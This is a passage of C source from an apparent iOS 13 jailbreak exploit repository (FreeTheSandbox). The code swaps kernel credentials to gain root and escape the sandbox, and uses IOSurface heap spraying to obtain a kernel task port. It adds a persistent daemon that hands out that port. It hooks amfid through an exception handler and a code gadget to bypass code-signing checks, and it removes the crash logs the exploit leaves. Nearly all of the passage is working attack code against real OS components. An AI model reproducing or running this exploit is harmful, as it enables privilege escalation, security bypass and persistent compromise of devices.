OFFSET_bsd_info_p_ucred);\n KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, kernel_p_ucred);\n}\n\nvoid safepatch_unswap_kernel_cred(uint64_t target_proc){\n \n KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, myold_cred);\n}\n\npid_t spindump_pid = 0;\nuint64_t spindump_proc_cred = 0;\nuint64_t myold_cred2 = 0;\nvoid safepatch_swap_spindump_cred(uint64_t target_proc){\n \n if(spindump_proc_cred == 0){\n spindump_pid = 0;\n if(!(spindump_pid = look_for_proc(\"/usr/sbin/spindump\"))){\n // if spindump is not running at moment\n if(fork() == 0){\n daemon(1, 1);\n close(STDIN_FILENO);\n close(STDOUT_FILENO);\n close(STDERR_FILENO);\n execvp(\"/usr/sbin/spindump\", NULL);\n exit(1);\n }\n while(!(spindump_pid = look_for_proc(\"/usr/sbin/spindump\"))){}\n }\n kill(spindump_pid, SIGSTOP);\n uint64_t spindump_proc = find_proc_byPID(spindump_pid);\n spindump_proc_cred = KernelRead_8bytes(spindump_proc + OFFSET_bsd_info_p_ucred);\n \n uint64_t target_task = KernelRead_8bytes(target_proc + OFFSET_bsd_info_task);\n patch_TF_PLATFORM(target_task);\n // this is a must-patch in order to get task-mani api to work\n }\n \n myold_cred2 = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, spindump_proc_cred);\n}\n\nvoid safepatch_unswap_spindump_cred(uint64_t target_proc){\n \n if(spindump_proc_cred){\n kill(spindump_pid, SIGCONT);\n kill(spindump_pid, SIGKILL);\n \n spindump_pid = 0;\n spindump_proc_cred = 0;\n }\n \n KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, myold_cred2);\n}\n\npid_t containermanagerd_pid = 0;\nuint64_t containermanagerd_proc_cred = 0;\nuint64_t myold_cred3 = 0;\nvoid safepatch_swap_containermanagerd_cred(uint64_t target_proc){\n \n if(containermanagerd_proc_cred == 0){\n containermanagerd_pid = 0;\n if(!(containermanagerd_pid = look_for_proc_basename(\"containermanagerd\"))){\n // containermanagerd should always be runnning\n }\n uint64_t containermanagerd_proc = find_proc_byPID(containermanagerd_pid);\n containermanagerd_proc_cred = KernelRead_8bytes(containermanagerd_proc + OFFSET_bsd_info_p_ucred);\n \n uint64_t target_task = KernelRead_8bytes(target_proc + OFFSET_bsd_info_task);\n patch_TF_PLATFORM(target_task);\n // this is a must-patch in order to get task-mani api to work\n }\n \n myold_cred3 = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, containermanagerd_proc_cred);\n}\n\nvoid safepatch_unswap_containermanagerd_cred(uint64_t target_proc){\n KernelWrite_8bytes(target_proc + OFFSET_bsd_info_p_ucred, myold_cred3);\n}\n\nvoid patch_root(uint64_t target_proc){\n \n uint64_t proc_p_ucred = KernelRead_8bytes(target_proc + OFFSET_bsd_info_p_ucred);\n uint64_t p_ucred_obtain_rootAndUnsandbox = proc_p_ucred + 0x18;\n \n char *old_cred = calloc(1, 0x68);\n KernelRead_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n \n uint64_t old_cr_label = *(uint64_t*)(old_cred + 0x60);\n bzero(old_cred, 0x68);\n \n if(old_cr_label){\n *(uint64_t*)(old_cred + 0x60) = old_cr_label;\n }\n \n KernelWrite_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n free(old_cred);\n}\n\nuint64_t leaked_MIDIServerPort_addr = 0;\nuint64_t seek_out_proc_who_request_tfp0() {\n uint64_t proc = KernelRead_8bytes(kaslr + HARDCODED_allproc);\n \n for (int i=0; i < 50; i++) {\n // this loop start from the most recent new proc\n \n if(!proc)\n return 0;\n \n uint64_t task = KernelRead_8bytes(proc + 0x10);\n if(!task)\n goto continue_1;\n \n uint64_t task_accesport = KernelRead_8bytes(task + OFFSET_task_itk_registered + 0x10); // check last item in itk_registered\n if(!task_accesport || task_accesport != leaked_MIDIServerPort_addr)\n goto continue_1;\n \n // attach tfp0 port\n patch_install_tfp0(task, tfp0_portStru);\n \n // Awaiting util proc shown sign of took usage of tfp0\n while((task_accesport = KernelRead_8bytes(task + OFFSET_task_itk_registered + 0x10))){\n }\n \n // Remove the tfp0 pointer avoid dealloc problem\n patch_remove_tfp0(task);\n \n \n continue_1:\n proc = KernelRead_8bytes(proc);\n }\n return 0;\n}\n\nvoid build_tfp0_persistence_for_research_purpose(){\n \n pid_t child_pid = fork();\n if(child_pid == 0){\n daemon(1, 1);\n \n do{\n patch_retrieve_tfp0();\n }while(tfp0_port == 0);\n \n uint64_t child_proc = find_proc_byPID(getpid());\n uint64_t child_task = KernelRead_8bytes(child_proc + 0x10);\n \n mach_port_t midi_bsport = 0;\n extern kern_return_t bootstrap_look_up(mach_port_t bp, const char *service_name, mach_port_t *sp);\n bootstrap_look_up(bootstrap_port, \"com.apple.midiserver\", &midi_bsport);\n if(midi_bsport)\n leaked_MIDIServerPort_addr = KernelLeak_portAddr(child_task, midi_bsport);\n \n int old_v = 0;\n while(1){\n uint32_t midiserver_ref = KernelRead_4bytes(leaked_MIDIServerPort_addr + offsetof(struct ipc_port, ip_references));\n \n if(!old_v || old_v > midiserver_ref)\n old_v = midiserver_ref;\n \n if(midiserver_ref > old_v){\n old_v = midiserver_ref;\n \n seek_out_proc_who_request_tfp0();\n }\n \n sleep(1);\n }\n // shoud never reach here\n }\n \n uint64_t child_proc = find_proc_byPID(child_pid);\n uint64_t child_task = KernelRead_8bytes(child_proc + 0x10);\n patch_install_tfp0(child_task, tfp0_portStru);\n}\n\n#pragma mark ---- exp ---- Convert R/W prim to TFP0\n\nvoid ios13_kernel_pwn(io_connect_t ioconn, io_connect_t surface_ioconn){\n \n pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, NULL);\n \n uint64_t InitInfo_map_addr = 0, InitInfo_map_size = 0;\n InitInfo_surfaceId = IOSurfaceRootUserClient_create_surface_map(surface_ioconn, &InitInfo_map_addr, (uint32_t*)&InitInfo_map_size);\n \n if(!InitInfo_surfaceId){\n (printf)(\"exp failed!\\n\");\n exit(1);\n }\n \n (printf)(\"InitInfo_surfaceId: 0x%x\\n\", InitInfo_surfaceId);\n Init_spraydata_for_TT1(InitInfo_surfaceId);\n Init_spraydata_for_TT2(InitInfo_surfaceId);\n \n uint64_t *remap_local_addr = 0;\n Send_overwritting_iosurfaceMap(InitInfo_map_addr, (uint64_t *)&remap_local_addr);\n \n inputmap_InitInfo = (char*)remap_local_addr;\n \n if(setjmp(reattempt_jmpb)){\n (printf)(\"RRRReatrmpe 9afioasf..\\n\");\n clean_up_everything();\n }\n \n add_new_client();\n add_new_client();\n add_new_client();\n add_new_client();\n add_new_client();\n add_new_client();\n add_new_client();\n \n *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n *(uint32_t*)(inputmap_InitInfo + 2020) = 160;\n *(uint32_t*)(inputmap_InitInfo + 2024) = 64;\n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n *(uint32_t*)(inputmap_InitInfo + 12) = 5;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n *(uint8_t*)(inputmap_InitInfo + 13377) = 1;\n *(uint32_t*)(inputmap_InitInfo + 2028) = 1;\n *(uint8_t*)(inputmap_InitInfo + 13288) = 1;\n \n {\n char input_stru[0x110] = {0};\n *(uint32_t*)(input_stru + 8) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n *(uint64_t*)(input_stru + 16) = InitInfo_surfaceId;\n \n *(uint64_t*)(input_stru + 24) = InitInfo_surfaceId;\n \n *(uint64_t*)(input_stru + 28) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 32) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 36) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 40) = InitInfo_surfaceId;\n *(uint64_t*)(input_stru + 44) = InitInfo_surfaceId;\n \n *(uint32_t*)(input_stru + 184) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 188) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 192) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 196) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 200) = InitInfo_surfaceId;\n \n *(uint32_t*)(input_stru + 204) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 208) = InitInfo_surfaceId;\n \n *(uint32_t*)(input_stru + 212) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 216) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 220) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 224) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 228) = InitInfo_surfaceId;\n \n *(uint32_t*)(input_stru + 232) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 236) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 240) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 244) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 248) = InitInfo_surfaceId;\n \n *(uint32_t*)(input_stru + 48) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 52) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 56) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 60) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 64) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 68) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 72) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 76) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 80) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 84) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 88) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 92) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 96) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 100) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 104) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 108) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 112) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 116) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 120) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 124) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 128) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 132) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 136) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 140) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 144) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 148) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 152) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 156) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 160) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 164) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 168) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 172) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 176) = InitInfo_surfaceId;\n *(uint32_t*)(input_stru + 180) = InitInfo_surfaceId;\n \n size_t output_stru_size = 4;\n char output_stru[4] = {0};\n for(int i=0; i<80; i++){\n IOConnectCallStructMethod(ioconn, 7, input_stru, 0x110, output_stru, &output_stru_size);\n }\n }\n \n hohoo222();\n \n TT2_send_spray_smallspray(); // seal up remaining hols\n for(int i=0; i last_v)){\n if((kObject_clientbuf - last_v) == 0x2c000){\n if((uint16_t)kObject_clientbuf != 0x0000){\n printf(\" Found the right clientbuf! 0x%llx\\n\", kObject_clientbuf);\n break;\n }\n }\n }\n if(last_v == 0){\n if((uint16_t)kObject_clientbuf != 0x0000){\n printf(\" Found the right clientbuf! 0x%llx\\n\", kObject_clientbuf);\n break;\n }\n }\n last_v = kObject_clientbuf;\n if(add_new_client() == 1){\n // when client list is full\n printf(\"client list is full.\\n\");\n for(int i=0; i= arrCnt){\n idx = arrCnt - 1;\n }\n return CFArrayGetValueAtIndex(theArray, idx);\n}\n\nvoid *cdhashFor(char *file){\n SecStaticCodeRef staticCode = NULL;\n \n CFStringRef cfstr_path = CFStringCreateWithCString(kCFAllocatorDefault, file, kCFStringEncodingUTF8);\n CFURLRef cfurl = CFURLCreateWithFileSystemPath(kCFAllocatorDefault, cfstr_path, kCFURLPOSIXPathStyle, false);\n CFRelease(cfstr_path);\n OSStatus result = SecStaticCodeCreateWithPathAndAttributes(cfurl, kSecCSDefaultFlags, NULL, &staticCode);\n CFRelease(cfurl);\n if (result != 0) {\n if (_SecCopyErrorMessageString != NULL) {\n CFStringRef error = _SecCopyErrorMessageString(result, NULL);\n \n (printf)(\"Unable to generate cdhash for %s: %s\\n\", file, CFStringGetCStringPtr(error, kCFStringEncodingUTF8));\n CFRelease(error);\n } else {\n (printf)(\"Unable to generate cdhash for %s: %d\\n\", file, result);\n }\n return nil;\n }\n \n CFDictionaryRef signinginfo;\n result = SecCodeCopySigningInformation(staticCode, kSecCSDefaultFlags, &signinginfo);\n CFRelease(staticCode);\n if (result != 0) {\n (printf)(\"Unable to copy cdhash info for %s\\n\", file);\n return NULL;\n }\n \n CFArrayRef cdhashes = CFDictionaryGetValue(signinginfo, CFSTR(\"cdhashes\"));\n CFArrayRef algos = CFDictionaryGetValue(signinginfo, CFSTR(\"digest-algorithms\"));\n int algoIndex = -1;\n CFNumberRef nn = CFArrayGetValueAtIndex_prevenOverFlow(algos, requiredHash);\n if(nn){\n CFNumberGetValue(nn, kCFNumberIntType, &algoIndex);\n }\n \n //(printf)(\"cdhashesCnt: %d\\n\", CFArrayGetCount(cdhashes));\n //(printf)(\"algosCnt: %d\\n\", CFArrayGetCount(algos));\n \n CFDataRef cdhash = NULL;\n if (cdhashes == NULL) {\n (printf)(\"%s: no cdhashes\\n\", file);\n } else if (algos == NULL) {\n (printf)(\"%s: no algos\\n\", file);\n } else if (algoIndex == -1) {\n (printf)(\"%s: does not have %s hash\", cdHashName[requiredHash], file);\n } else {\n cdhash = CFArrayGetValueAtIndex_prevenOverFlow(cdhashes, requiredHash);\n if (cdhash == NULL) {\n (printf)(\"%s: missing %s cdhash entry\\n\", file, cdHashName[requiredHash]);\n }\n }\n if(cdhash == NULL){\n CFRelease(signinginfo);\n return NULL;\n }\n \n //(printf)(\"cdhash len: %d\\n\", CFDataGetLength(cdhash));\n char *rv = calloc(1, 20);\n memcpy(rv, CFDataGetBytePtr(cdhash), 20);\n CFRelease(signinginfo);\n return rv;\n}\n\nvoid *Build_ValidateSignature_dic(uint8_t *input_cdHash, size_t *out_size, uint64_t shadowp){\n // Build a self-contained, remote-address-adapted CFDictionary instance\n \n CFDataRef _cfhash_cfdata = CFDataCreate(kCFAllocatorDefault, input_cdHash, 20);\n void *cfhash_cfdata = (void*)_cfhash_cfdata;\n const char *iomatch_key = \"CdHash\";\n \n size_t key_len = strlen(iomatch_key) + 0x11;\n key_len = (~0xF) & (key_len + 0xF);\n size_t value_len = 0x60; // size of self-contained CFData instance\n value_len = (~0xF) & (value_len + 0xF);\n size_t total_len = key_len + value_len + 0x20;\n \n *out_size = total_len;\n void *writep = calloc(1, total_len);\n \n char *realCFString = (char*)CFStringCreateWithCString(0, \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\", kCFStringEncodingUTF8);\n char *keys[] = {realCFString};\n char *values[] = {realCFString};\n char *realCFDic = (char*)CFDictionaryCreate(0, (const void**)keys, (const void**)values, 1, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);\n CFRetain(realCFDic); // Pump in some extra lifes\n CFRetain(realCFDic);\n CFRetain(realCFDic);\n CFRetain(realCFDic);\n memcpy(writep, realCFDic, 0x20);\n \n writep = writep + total_len - value_len;\n shadowp = shadowp + total_len - value_len;\n uint64_t value = shadowp;\n memcpy(writep, cfhash_cfdata, 0x60);\n CFRelease(cfhash_cfdata);\n \n writep -= key_len;\n shadowp -= key_len;\n uint64_t key = shadowp;\n *(uint64_t*)(writep) = *(uint64_t*)realCFString;\n *(uint64_t*)(writep + 8) = *(uint64_t*)(realCFString + 8);\n *(uint8_t*)(writep + 16) = strlen(iomatch_key);\n memcpy(writep + 17, iomatch_key, strlen(iomatch_key));\n \n writep -= 0x20;\n shadowp -= 0x20;\n *(uint64_t*)(writep + 0x8) = value;\n *(uint64_t*)(writep + 0x10) = key;\n \n CFRelease(realCFDic);\n CFRelease(realCFDic);\n CFRelease(realCFDic);\n CFRelease(realCFDic);\n CFRelease(realCFDic);\n CFRelease(realCFString);\n \n return writep;\n}\n\nuint64_t reserved_mem_in_amfid = 0;\nuint64_t update_cdhash_in_amfid = 0;\nuint64_t update_retainCnt_in_amfid = 0;\nvoid* amfid_exception_handler(void* arg){\n uint32_t size = 0x1000;\n mach_msg_header_t* msg = malloc(size);\n for(;;){\n kern_return_t err;\n //printf(\"calling mach_msg to receive exception message from amfid\\n\");\n err = mach_msg(msg,\n MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, // no timeout\n 0,\n size,\n amfid_exception_port,\n 0,\n 0);\n if (err != KERN_SUCCESS){\n //printf(\"error receiving on exception port: %s\\n\", mach_error_string(err));\n } else {\n //(printf)(\"got exception message from amfid!\\n\");\n \n exception_raise_request* req = (exception_raise_request*)msg;\n \n mach_port_t thread_port = req->thread.name;\n mach_port_t task_port = req->task.name;\n _STRUCT_ARM_THREAD_STATE64 old_state = {0};\n mach_msg_type_number_t old_stateCnt = sizeof(old_state)/4;\n err = thread_get_state(thread_port, ARM_THREAD_STATE64, (thread_state_t)&old_state, &old_stateCnt);\n if (err != KERN_SUCCESS){\n //printf(\"error getting thread state: %s\\n\", mach_error_string(err));\n continue;\n }\n \n _STRUCT_ARM_THREAD_STATE64 new_state;\n memcpy(&new_state, &old_state, sizeof(_STRUCT_ARM_THREAD_STATE64));\n \n // get the filename pointed to by X23 (or x24 after iOS 13.5)\n extern bool check_if_amfid_has_entitParser(void);\n char* filename = rmem(task_port, check_if_amfid_has_entitParser()?new_state.__x[24]:new_state.__x[23], 1024);\n //(printf)(\"got filename for amfid request: %s\\n\", filename);\n \n#define TRUST_CDHASH_LEN (20)\n \n uint8_t *cdhash = cdhashFor(filename);\n if(cdhash){\n uint32_t offset_to_store = 0x50;\n if(reserved_mem_in_amfid == 0){\n // Allocate a page of memory in amfid, where we stored cfdic for bypass signature valid\n vm_allocate(task_port, (vm_address_t*)&reserved_mem_in_amfid, 0x4000, VM_FLAGS_ANYWHERE);\n //(printf)(\"reserved_mem_in_amfid: 0x%llx\\n\", reserved_mem_in_amfid);\n \n TaskWrite_8bytes(task_port, reserved_mem_in_amfid + 0x28, 0);\n \n size_t out_size = 0;\n char *fakedic = Build_ValidateSignature_dic(cdhash, &out_size, reserved_mem_in_amfid + offset_to_store);\n TaskWrite_anySize(task_port, reserved_mem_in_amfid + offset_to_store, fakedic, (uint32_t)out_size);\n update_cdhash_in_amfid = reserved_mem_in_amfid + offset_to_store + 0x70; // To update cdhash in the same cfdic\n update_retainCnt_in_amfid = *(uint64_t*)(fakedic); // To keep dic away from being release\n free(fakedic);\n }\n else{\n if(cdhash){\n for (int i = 0; i < TRUST_CDHASH_LEN; i++){\n TaskWrite_1byte(task_port, update_cdhash_in_amfid + i, cdhash[i]);\n }\n TaskWrite_8bytes(task_port, reserved_mem_in_amfid + offset_to_store, update_retainCnt_in_amfid);\n }\n }\n free(cdhash);\n }\n \n TaskWrite_8bytes(task_port, old_state.__x[2], reserved_mem_in_amfid + 0x50);\n new_state.__x[8] = reserved_mem_in_amfid; // For the next encouter instr: LDR X0, [X8,#0x28] <- Clear out X0 as success return\n \n \n // set the new thread state:\n err = thread_set_state(thread_port, ARM_THREAD_STATE64, (thread_state_t)&new_state, sizeof(new_state)/4);\n \n exception_raise_reply reply = {0};\n \n reply.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(req->Head.msgh_bits), 0);\n reply.Head.msgh_size = sizeof(reply);\n reply.Head.msgh_remote_port = req->Head.msgh_remote_port;\n reply.Head.msgh_local_port = MACH_PORT_NULL;\n reply.Head.msgh_id = req->Head.msgh_id + 100;\n \n reply.NDR = req->NDR;\n reply.RetCode = KERN_SUCCESS;\n \n err = mach_msg(&reply.Head,\n MACH_SEND_MSG|MACH_MSG_OPTION_NONE,\n (mach_msg_size_t)sizeof(reply),\n 0,\n MACH_PORT_NULL,\n MACH_MSG_TIMEOUT_NONE,\n MACH_PORT_NULL);\n \n mach_port_deallocate(mach_task_self(), thread_port);\n mach_port_deallocate(mach_task_self(), task_port);\n }\n }\n return NULL;\n}\n\nvoid set_exception_handler(mach_port_t amfid_task_port){\n // allocate a port to receive exceptions on:\n mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &amfid_exception_port);\n mach_port_insert_right(mach_task_self(), amfid_exception_port, amfid_exception_port, MACH_MSG_TYPE_MAKE_SEND);\n \n kern_return_t err = task_set_exception_ports(amfid_task_port,\n EXC_MASK_ALL,\n amfid_exception_port,\n EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, // we want to receive a catch_exception_raise message with the thread port for the crashing thread\n ARM_THREAD_STATE64);\n \n if (err != KERN_SUCCESS){\n (printf)(\"error setting amfid exception port: %s\\n\", mach_error_string(err));\n } else {\n (printf)(\"set amfid exception port: succeed!\\n\");\n }\n \n // spin up a thread to handle exceptions:\n pthread_t exception_thread;\n pthread_create(&exception_thread, &pth_commAttr, amfid_exception_handler, NULL);\n}\n\nvoid patch_amfid(pid_t amfid_pid){\n uint32_t amfid_task = 0;\n task_for_pid(mach_task_self(), amfid_pid, &amfid_task);\n (printf)(\"amfid_task: 0x%x\\n\", amfid_task);\n \n set_exception_handler(amfid_task);\n \n amfid_base = binary_load_addr(amfid_task);\n (printf)(\"amfid_base: 0x%llx\\n\", amfid_base);\n \n vm_protect(amfid_task, mach_vm_trunc_page(amfid_base + amfid_OFFSET_MISValidate_symbol), 0x4000, false, VM_PROT_READ|VM_PROT_WRITE);\n#if __arm64e__\n extern uint64_t PACSupport_pacia(uint64_t code_ptr, uint64_t modifier);\n uint64_t redirect_pc = PACSupport_pacia(amfid_base + amfid_OFFSET_gadget, amfid_base + amfid_OFFSET_MISValidate_symbol);\n#else\n uint64_t redirect_pc = amfid_base + amfid_OFFSET_gadget;\n#endif\n TaskWrite_8bytes(amfid_task, amfid_base + amfid_OFFSET_MISValidate_symbol, redirect_pc);\n}\n\nuint64_t find_amfid_OFFSET_MISValidate_symbol(uint8_t *amfid_macho){\n \n uint32_t MISValidate_symIndex = 0;\n struct mach_header_64 *mh = (struct mach_header_64*)amfid_macho;\n const uint32_t cmd_count = mh->ncmds;\n struct load_command *cmds = (struct load_command*)(mh + 1);\n struct load_command* cmd = cmds;\n for (uint32_t i = 0; i < cmd_count; ++i){\n switch (cmd->cmd) {\n case LC_SYMTAB:{\n struct symtab_command *sym_cmd = (struct symtab_command*)cmd;\n uint32_t symoff = sym_cmd->symoff;\n uint32_t nsyms = sym_cmd->nsyms;\n uint32_t stroff = sym_cmd->stroff;\n \n for(int i =0;in_type==0x1){\n // 0x1 indicates external function\n def_str = (char*)mh+(uint32_t)nn->n_un.n_strx + stroff;\n if(!strcmp(def_str, \"_MISValidateSignatureAndCopyInfo\")){\n break;\n }\n }\n if(i!=0 && i!=1){ // Two at beginning are local symbols, they don't count\n MISValidate_symIndex++;\n }\n }\n }\n break;\n }\n cmd = (struct load_command*)((char*)cmd + cmd->cmdsize);\n }\n \n if(MISValidate_symIndex == 0){\n printf(\"Error in find_amfid_OFFSET_MISValidate_symbol(): MISValidate_symIndex == 0\\n\");\n exit(1);\n }\n \n const struct section_64 *sect_info = NULL;\n if(check_if_its_PAC_device()){\n const char *_segment = \"__DATA_CONST\", *_segment2 = \"__DATA\", *_section = \"__auth_got\";\n // _segment for iOS 13, _segment2 for <= iOS 12\n sect_info = getsectbynamefromheader_64((const struct mach_header_64 *)amfid_macho, _segment, _section);\n if(!sect_info)\n sect_info = getsectbynamefromheader_64((const struct mach_header_64 *)amfid_macho, _segment2, _section);\n }else{\n const char *_segment = \"__DATA\", *_section = \"__la_symbol_ptr\";\n sect_info = getsectbynamefromheader_64((const struct mach_header_64 *)amfid_macho, _segment, _section);\n }\n \n if(!sect_info){\n printf(\"Error in find_amfid_OFFSET_MISValidate_symbol(): if(!sect_info)\\n\");\n exit(1);\n }\n \n return sect_info->offset + (MISValidate_symIndex * 0x8);\n}\n\nuint64_t find_amfid_OFFSET_gadget(uint8_t *amfid_macho){\n const char *_segment = \"__TEXT\", *_section = \"__text\";\n const struct section_64 *sect_info = getsectbynamefromheader_64((const struct mach_header_64 *)amfid_macho, _segment, _section);\n if(!sect_info){\n printf(\"Error in find_amfid_OFFSET_gadget(): if(!sect_info)\\n\");\n exit(1);\n }\n unsigned long sect_size = 0;\n uint64_t sect_data = (uint64_t)getsectiondata((const struct mach_header_64 *)amfid_macho, _segment, _section, §_size);\n \n char _bytes_gadget[] = {\n 0x08, 0x29, 0x09, 0x9B, // madd x8, x8, x9, x10\n 0x00, 0x15, 0x40, 0xF9, // ldr x0, [x8, #0x28]\n 0xC0, 0x03, 0x5F, 0xD6, // ret\n };\n char _bytes_gadget2[] = {\n 0x08, 0x25, 0x2A, 0x9B, // smaddl x8, w8, w10, x9\n 0x00, 0x15, 0x40, 0xF9, // ldr x0, [x8, #0x28]\n 0xC0, 0x03, 0x5F, 0xD6, // ret\n };\n \n uint64_t find_gadget = (uint64_t)memmem((void*)sect_data, sect_size, _bytes_gadget, sizeof(_bytes_gadget));\n if(!find_gadget)\n find_gadget = (uint64_t)memmem((void*)sect_data, sect_size, _bytes_gadget2, sizeof(_bytes_gadget2));\n if(!find_gadget){\n printf(\"Error in find_amfid_OFFSET_gadget(): if(!find_gadget)\\n\");\n exit(1);\n }\n \n return (find_gadget - sect_data) + sect_info->offset;\n}\n\nsize_t amfid_fsize = 0;\nuint8_t *map_file_to_mem(const char *path){\n \n struct stat fstat = {0};\n stat(path, &fstat);\n amfid_fsize = fstat.st_size;\n \n int fd = open(path, O_RDONLY);\n uint8_t *mapping_mem = mmap(NULL, mach_vm_round_page(amfid_fsize), PROT_READ, MAP_SHARED, fd, 0);\n if((int)mapping_mem == -1){\n printf(\"Error in map_file_to_mem(): mmap() == -1\\n\");\n exit(1);\n }\n return mapping_mem;\n}\n\n\n#pragma mark ---- Post-exp ---- Copy Jailbreak Resources\n\n\n#include \n#include \n#include \n\nvoid display_ip_address(){\n struct ifaddrs *interfaces = NULL;\n struct ifaddrs *temp_addr = NULL;\n if(getifaddrs(&interfaces) == 0){\n temp_addr = interfaces;\n while(temp_addr != NULL) {\n if(temp_addr->ifa_addr->sa_family == AF_INET) {\n \n printf(\" %s: \", temp_addr->ifa_name);\n char *ip_addr = inet_ntoa(((struct sockaddr_in *)temp_addr->ifa_addr)->sin_addr);\n printf(\" %s\\n\", ip_addr);\n }\n temp_addr = temp_addr->ifa_next;\n }\n freeifaddrs(interfaces);\n }else{\n printf(\"Error: getifaddrs\\n\");\n }\n}\n\nvoid remove_crash_thats_caused_by_exp(const char *name)\n{\n DIR *dir;\n struct dirent *entry;\n \n if (!(dir = opendir(name))){\n return;\n }\n \n while ((entry = readdir(dir)) != NULL) {\n char path[1024];\n snprintf(path, sizeof(path), \"%s/%s\", name, entry->d_name);\n \n if(!strncmp(entry->d_name, \"symptomsd-\", 10)){\n remove(path); unlink(path);\n }\n }\n closedir(dir);\n}\n\nvoid run_post_exp_from_tfp0(){\n pth_commAttr_init();\n Apply_hardcoded_addresses_and_offsets();\n \n our_proc_kAddr = find_proc_byPID(getpid());\n our_task_kAddr = KernelRead_8bytes(our_proc_kAddr + OFFSET_bsd_info_task);\n \n safepatch_swap_unsandbox_and_root(our_proc_kAddr);\n \n printf(\"our uid: %d\\n\", getuid());\n // Any any code here will get to run as root and no-sandbox!\n \n safepatch_unswap_unsandbox_and_root(our_proc_kAddr);\n}\n" }, { "path": "Exploits/FreeTheSandbox/ios13_userspace.c", "content": "//\n// ios13_userspace.c\n// ios13_app1\n//\n// Created by bb on 1/12/20.\n// Copyright © 2020 bb. All rights reserved.\n//\n\n// Update* For 13.4/13.4.1 Support, started using AOP instead of ROP\n\n#if !__arm64e__\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \"IOKitLib.h\"\n#include \"xpc.h\"\n#include \"freethesandbox.h\"\n\nextern kern_return_t bootstrap_look_up(mach_port_t bp, char *service_name, mach_port_t *sp);\n\n#pragma pack(4)\n\n#define SPRAY_ADDRESS 0x150010000\n\n#define TARGET_MACH_SERVICE \"com.apple.usymptomsd\"\n#define TARGET_MACH_SERVICE_2 \"com.apple.symptoms.symptomsd.managed_events\"\n\n#define OF(offset) (offset)/sizeof(uint64_t)\n#define exit(X) longjmp(jmpb, 1)\n\njmp_buf jmpb;\n\n#define MACH_MSG_GUARD_FLAGS_NONE 0x0000\n#define MACH_MSG_GUARD_FLAGS_IMMOVABLE_RECEIVE 0x0001 /* Move the receive right and mark it as immovable */\n#define MACH_MSG_GUARD_FLAGS_UNGUARDED_ON_SEND 0x0002 /* Verify that the port is unguarded */\n#define MACH_MSG_GUARD_FLAGS_MASK 0x0003 /* Valid flag bits */\n\ntypedef 